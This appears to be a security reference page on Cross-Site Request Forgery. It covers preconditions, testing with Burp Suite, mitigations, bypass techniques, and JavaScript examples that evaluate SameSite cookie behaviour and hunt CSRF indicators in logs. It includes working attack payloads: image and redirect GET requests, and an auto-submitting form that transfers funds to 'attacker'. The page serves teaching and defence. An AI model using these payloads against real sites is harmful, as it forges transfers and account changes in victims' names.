🧠 Description

What is CSRF?

Cross-Site Request Forgery (CSRF) makes an authenticated user's browser send a request the user never intended to a web application. The browser attaches the victim's ambient credentials (session cookie, HTTP Basic auth) automatically, so the application treats the forged request as the victim's own. The attacker cannot read the response, but can trigger state-changing actions.

CSRF allows attackers to:
  • Change user password
  • Transfer funds
  • Modify account settings
  • Delete data
  • Make purchases

🏷️ Classification

  • Type: Cross-Site Request Forgery (CWE-352)
  • OWASP: A01:2021 - Broken Access Control
  • Types: GET-based CSRF, POST-based CSRF, Stored CSRF (the forging payload is injected into the target site itself, so no external attacker page is needed)

🎯 Attack Surface

  • ✅ User profile updates
  • ✅ Password change forms
  • ✅ Money transfers
  • ✅ Email settings
  • ✅ Delete operations

⚠️ Preconditions

  • User is authenticated to the target, and authentication relies on ambient credentials (session cookie, HTTP Basic auth) rather than a token the page must add explicitly
  • State-changing requests carry no unpredictable, server-validated CSRF token (or the token is present but not actually checked)
  • The session cookie is sent on cross-site requests (SameSite=None, or no SameSite attribute in a browser that does not default to Lax)
  • Attacker can get the victim to load an attacker-controlled page (or an HTML injection point on a trusted site) while logged in

🔍 Detection

  • Check whether forms and state-changing API calls carry a CSRF token, and whether the token is bound to the user's session
  • Replay state-changing actions without the token, with an empty token, and with another user's token; note whether each still succeeds
  • Check the session cookie's SameSite attribute, and whether any GET request changes state (SameSite=Lax does not protect those)

🔧 Burp Suite Workflow

  1. Capture a state-changing request (e.g. an email or password change) from a logged-in session
  2. Send it to Repeater and remove the CSRF token parameter
  3. Replay the request without the token; then also try an empty token, a token taken from a second account, and the same action switched from POST to GET
  4. If any variant succeeds, token validation is broken and the action is vulnerable to CSRF; confirm with a generated PoC page (Engagement tools > Generate CSRF PoC) loaded in a browser that holds the victim session

⚙️ Tool Automation

  • CSRF Scanner: Burp Suite extension that flags requests carrying no anti-CSRF token
  • OWASP ZAP: flags forms without anti-CSRF tokens (passive scan rule "Absence of Anti-CSRF Tokens")

💣 Basic Payloads

🔧 GET-based CSRF (only works when the GET handler itself changes state)
<img src="http://target.com/change-email?new=test@attacker.com">
<script>window.location='http://target.com/delete?id=123'</script>
Note: the <img> request is a subresource fetch, so a SameSite=Lax session cookie is not attached to it; the window.location redirect is a top-level navigation and does carry a Lax cookie.
🔧 POST-based CSRF (the form must still be submitted, by script or by the victim; see the Proof of Concept)
<form action="http://target.com/transfer" method="POST"><input type="hidden" name="to" value="attacker"><input type="hidden" name="amount" value="10000"></form>

📝 Proof of Concept

<!-- Malicious page hosted by the attacker: auto-submits a cross-site POST that the browser sends with the victim's bank.com session cookie -->
<html>
<body>
<form action="https://bank.com/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
The PoC only succeeds if bank.com's session cookie is sent on a cross-site POST, i.e. it is SameSite=None (or has no SameSite attribute in a browser that does not default to Lax); the victim sees the bank's response page unless the form is submitted into a hidden iframe.

💥 Impact Analysis

Severity: MEDIUM (CVSS 6.5 is typical); rate it HIGH when the forged action changes credentials, moves money, or is reachable from a stored payload
  • Account takeover
  • Unauthorized transactions
  • Data modification
  • Reputation damage

🛡️ Mitigation

✅ CSRF Tokens: Use unpredictable anti-CSRF tokens (synchronizer or signed double-submit) on all state-changing requests, bound to the user's session and compared server-side in constant time

✅ SameSite Cookies: Set SameSite=Strict or Lax on the session cookie; Lax still sends the cookie on cross-site top-level GET navigations, so no GET handler may change state

✅ Origin/Referer Validation: Check the Origin header (fall back to Referer) against an allow-list of your own origins with an exact match, and reject state-changing requests that carry neither

🏰 Advanced Mitigation

# Strict: never sent on any cross-site request (also breaks arriving at the app logged in from an external link)
Set-Cookie: session=abc; SameSite=Strict; Secure; HttpOnly

# Lax: sent on cross-site top-level GET navigations only, so GET handlers must never change state
Set-Cookie: session=abc; SameSite=Lax; Secure; HttpOnly

# SameSite=None requires Secure; without it current browsers drop the cookie entirely
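To see what each SameSite value actually does against the three payload shapes on this page, here is an added example (not from the original page) that parses a Set-Cookie header and applies the SameSite rules to a cross-site request made by an <img> tag, a window.location redirect, and an auto-submitted POST form. The request-context shape and the laxByDefault flag (which models Chromium treating a cookie with no SameSite attribute as Lax) are assumptions of the example; Chromium's temporary "Lax+POST" allowance for cookies less than two minutes old is deliberately not modelled.

```javascript
// Added example, not code from the original page: parse a Set-Cookie header and
// work out whether a browser applying the SameSite rules would attach the cookie
// to a cross-site request. The context shape and the laxByDefault flag are
// assumptions of this example.

// Parse "name=value; Attr; Attr=val" into a plain object.
function parseSetCookie(header) {
  const parts = header.split(';').map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf('=');
  const cookie = {
    name: parts[0].slice(0, eq).trim(),
    value: parts[0].slice(eq + 1).trim(),
    secure: false,
    httpOnly: false,
    sameSite: null, // null = attribute absent
  };
  for (const attr of parts.slice(1)) {
    const [k, v = ''] = attr.split('=');
    const key = k.trim().toLowerCase();
    if (key === 'secure') cookie.secure = true;
    else if (key === 'httponly') cookie.httpOnly = true;
    else if (key === 'samesite') cookie.sameSite = v.trim().toLowerCase();
  }
  return cookie;
}

// Effective policy. laxByDefault=true models Chromium-family browsers, which treat
// a missing SameSite attribute as Lax; false models browsers that default to None.
// SameSite=None without Secure is rejected outright by current browsers.
function effectiveSameSite(cookie, laxByDefault) {
  if (cookie.sameSite === 'strict' || cookie.sameSite === 'lax') return cookie.sameSite;
  if (cookie.sameSite === 'none') return cookie.secure ? 'none' : 'rejected';
  return laxByDefault ? 'lax' : 'none'; // absent or unrecognised value
}

// ctx describes the forged request from the attacker's page:
//   <img src=...>           -> { method: 'GET',  topLevelNavigation: false }
//   window.location = ...   -> { method: 'GET',  topLevelNavigation: true }
//   auto-submitted <form>   -> { method: 'POST', topLevelNavigation: true }
// (Chromium's temporary "Lax+POST" allowance is deliberately not modelled.)
function sentCrossSite(cookie, ctx, laxByDefault = true) {
  const policy = effectiveSameSite(cookie, laxByDefault);
  const safeMethod = ['GET', 'HEAD', 'OPTIONS', 'TRACE'].includes(ctx.method.toUpperCase());
  switch (policy) {
    case 'none':   return true;
    case 'strict': return false;
    case 'lax':    return ctx.topLevelNavigation && safeMethod;
    default:       return false; // rejected cookie was never stored
  }
}

const PAYLOADS = {
  imgTag:           { method: 'GET',  topLevelNavigation: false },
  locationRedirect: { method: 'GET',  topLevelNavigation: true },
  autoSubmitForm:   { method: 'POST', topLevelNavigation: true },
};

// Evaluate one Set-Cookie header against all three payload shapes.
function assessCookie(header, laxByDefault = true) {
  const cookie = parseSetCookie(header);
  const out = {};
  for (const [name, ctx] of Object.entries(PAYLOADS)) {
    out[name] = sentCrossSite(cookie, ctx, laxByDefault);
  }
  return out;
}

// Stand-alone run: the page's Strict cookie next to Lax, None and no-attribute variants.
for (const h of ['session=abc; SameSite=Strict; Secure',
                 'session=abc; SameSite=Lax; Secure',
                 'session=abc; SameSite=None; Secure',
                 'session=abc']) {
  console.log(h.padEnd(40), JSON.stringify(assessCookie(h)));
}
```

The Lax row is the one to remember: the window.location redirect still carries the cookie, which is exactly why a state-changing GET endpoint stays exploitable under SameSite=Lax, while the <img> and auto-submitted form payloads are stopped.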

📊 Monitoring & Detection

  • Monitor for CSRF token validation failures (missing, empty, mismatched) per session and per source IP; a burst from one session is either an attack or a broken client
  • Alert on state-changing requests whose Origin/Referer is a foreign site, and on any state-changing request that succeeds without a valid token (the control is missing on that endpoint)

🔐 Security Controls

Control            Implementation
CSRF Token         Per-request or per-session synchronizer tokens, bound to the session and compared in constant time
SameSite Cookies   Set SameSite=Strict (or Lax, provided no GET request changes state)
Custom Header      Require a custom header (e.g. X-Requested-With) on API calls; a cross-site page cannot add it without a CORS preflight, which the server must not approve for foreign origins

🔓 Bypass Techniques

  • Validation skipped when the token parameter is absent or empty, or when the request method is switched from POST to GET
  • Token not bound to the session: a token from the attacker's own account is accepted on the victim's session
  • Cookie injection / session fixation: if the token is compared only against a cookie the attacker can plant (e.g. from a sibling subdomain), the attacker supplies a matching cookie/token pair
  • Cross-site scripting on the target (or on a subdomain that can read the token) to steal the token and submit the request with it
  • Clickjacking to make the victim submit the legitimate, token-bearing form themselves
  • Origin/Referer checks that match a substring (bank.com.attacker.example) or that skip validation when the header is absent

🛠️ Tools

  • Burp CSRF Scanner: Burp Suite extension that auto-detects requests lacking anti-CSRF tokens
  • CSRF PoC Generator (Burp Engagement tools > Generate CSRF PoC): generates an attack page from a captured request

🔄 Retest Steps

Step  Action
1     Add CSRF tokens to every state-changing request and validate them server-side
2     Re-test each action without the token, with an empty token, and with another session's token; every variant must be rejected
3     Verify the session cookie is set with SameSite=Strict or Lax (plus Secure and HttpOnly) and that no GET request changes state

⚙️ Detection Logic

For each state-changing endpoint, confirm that a CSRF token is required and actually validated server-side (not merely present in the form), then confirm the session cookie carries a SameSite attribute and that no GET endpoint changes state.

🔎 Threat-Hunting

Indicators: bursts of token validation failures from one session, state-changing requests whose Origin/Referer is a foreign site, and state-changing requests that succeed without a token. Missing tokens and a session cookie without SameSite are weaknesses to fix, not incidents on their own.
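The indicators listed under Monitoring & Detection and in the Threat-Hunting line above, run as an added example (not code from the original page) over constructed application log lines. The key=value log format, the field names (sid, origin, csrf, result), the bank.com allow-list and the thresholds are assumptions of this example; adapt them to whatever your framework actually emits.

```javascript
// Added example, not code from the original page: a hunting pass over constructed
// application log lines for the CSRF indicators on this page. The key=value log
// format, field names and thresholds are assumptions of this example.

// Constructed sample log: session s1 hammered from a foreign origin without a
// token, one endpoint (/change-email) that lets a token-less POST through,
// normal traffic from s2, and a single stale-token failure from s4.
const SAMPLE_LOG = [
  '2024-05-01T10:00:01Z sid=s1 ip=203.0.113.5 method=POST path=/transfer origin=https://attacker.example csrf=token-missing result=deny',
  '2024-05-01T10:00:02Z sid=s1 ip=203.0.113.5 method=POST path=/transfer origin=https://attacker.example csrf=token-missing result=deny',
  '2024-05-01T10:00:03Z sid=s1 ip=203.0.113.5 method=POST path=/transfer origin=https://attacker.example csrf=token-missing result=deny',
  '2024-05-01T10:00:09Z sid=s2 ip=198.51.100.7 method=POST path=/profile origin=https://bank.com csrf=ok result=allow',
  '2024-05-01T10:00:12Z sid=s3 ip=198.51.100.9 method=POST path=/change-email origin=- csrf=token-missing result=allow',
  '2024-05-01T10:00:15Z sid=s2 ip=198.51.100.7 method=GET path=/account origin=- csrf=- result=allow',
  '2024-05-01T10:00:20Z sid=s4 ip=192.0.2.8 method=POST path=/transfer origin=https://bank.com csrf=token-mismatch result=deny',
];

// "<ts> k=v k=v ..." -> { ts, k: v, ... }
function parseLine(line) {
  const [ts, ...pairs] = line.trim().split(/\s+/);
  const rec = { ts };
  for (const pair of pairs) {
    const i = pair.indexOf('=');
    rec[pair.slice(0, i)] = pair.slice(i + 1);
  }
  return rec;
}

const SAFE_METHODS = new Set(['GET', 'HEAD', 'OPTIONS']);

// Three rules:
//   cross-site-origin     state-changing request from an origin outside the allow-list
//   unprotected-endpoint  state-changing request allowed without a valid token
//   token-failure-burst   failureThreshold token failures for one session within windowMs
function hunt(lines, { allowedOrigins, failureThreshold = 3, windowMs = 60000 }) {
  const findings = [];
  const seenOrigin = new Set();   // dedupe rule 1 per (sid, origin, path)
  const failures = new Map();     // sid -> recent failure timestamps (ms)
  for (const rec of lines.map(parseLine)) {
    if (SAFE_METHODS.has(rec.method)) continue;
    if (rec.origin !== '-' && !allowedOrigins.includes(rec.origin)) {
      const key = `${rec.sid}|${rec.origin}|${rec.path}`;
      if (!seenOrigin.has(key)) {
        seenOrigin.add(key);
        findings.push({ rule: 'cross-site-origin', sid: rec.sid, origin: rec.origin, path: rec.path });
      }
    }
    if (rec.result === 'allow' && rec.csrf !== 'ok') {
      findings.push({ rule: 'unprotected-endpoint', sid: rec.sid, path: rec.path });
    }
    if (rec.result === 'deny' && rec.csrf.startsWith('token-')) {
      const now = Date.parse(rec.ts);
      const recent = (failures.get(rec.sid) || []).filter((t) => now - t <= windowMs);
      recent.push(now);
      failures.set(rec.sid, recent);
      if (recent.length === failureThreshold) {
        findings.push({ rule: 'token-failure-burst', sid: rec.sid, count: recent.length, ip: rec.ip });
      }
    }
  }
  return findings;
}

// Stand-alone run over the constructed sample.
for (const f of hunt(SAMPLE_LOG, { allowedOrigins: ['https://bank.com'] })) {
  console.log(JSON.stringify(f));
}
```

The unprotected-endpoint rule is the one most teams forget: a request that was allowed with csrf=token-missing means the token check is not wired up on that handler, which is a control failure to fix immediately rather than an attacker to chase.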

🛡️ Defensive

Browser-level protection (SameSite cookie handling, including Chromium's Lax-by-default) reduces exposure but is not a substitute for server-side tokens. CSP's form-action directive limits where the application's own pages may submit forms; it does nothing against a forged request originating from the attacker's page.
